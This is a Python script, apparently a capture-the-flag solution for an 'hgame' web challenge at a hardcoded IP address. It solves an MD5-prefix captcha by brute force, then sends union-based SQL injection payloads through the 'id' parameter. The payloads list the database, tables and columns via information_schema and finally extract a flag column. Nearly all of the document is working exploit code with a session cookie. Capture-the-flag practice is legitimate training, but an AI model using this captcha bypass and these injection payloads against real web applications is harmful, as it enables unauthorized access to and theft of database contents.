import requests import hashlib url = "http://118.89.111.179:3000" cookie={'PHPSESSID':'bcsjkikm26hfpfq502ogcklf6d'} def getcode(): rlt = requests.get(url,cookies=cookie) print(rlt.text) code=rlt.text[-18:-14] for i in range(0,9999999): if hashlib.md5(str(i).encode()).hexdigest()[0:4] == code: answer=str(i) break print(answer) return answer def sqlcode(go): answer = getcode() url1=url+"/?code="+answer+"&id="+go r = requests.get(url=url1,cookies=cookie) print(url1) print(r.text) a="1 union select database()#" # 获取数据库 b="1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#" #获取表名 c="1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)%23" #获取列名 d="1 union select f14444444g from hgame.f1l1l1l1g" sqlcode(d)